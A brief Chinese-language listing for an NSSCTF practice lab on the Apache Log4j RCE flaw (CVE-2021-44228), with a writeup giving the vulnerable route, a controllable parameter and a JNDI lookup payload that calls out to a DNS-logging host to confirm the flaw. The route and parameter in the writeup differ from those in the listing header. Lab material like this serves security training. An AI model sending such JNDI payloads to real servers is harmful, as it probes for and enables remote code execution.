Vulfocus log4j2-rce靶机
| ID: | 12079 |
|---|---|
| 标题: | Vulfocus log4j2-rce靶机 |
| 描述: | 入口路由为/hello,参数为payload |
| 类型: | Log4j |
| 网站: | NSSCTF |
| 题目链接: | https://www.nssctf.cn/problem/1125 |
| 赛事: | None |
| 年度: | None |
| Flag值: | 无 |
| writeup: |
验证后的网址 NSSCTF平台实战Apache log4j漏洞靶机(CVE-2021-44228)的入口路由为/webstudy/hello-fengxuan,POST参数c可控,提交payload ${jndi:ldap://y3r9ua.dnslog.cn}可触发漏洞。验证过程需通过DNSLOG平台检测DNS查询记录 1。 https://blog.csdn.net/weixin_52270928/article/details/130587525 |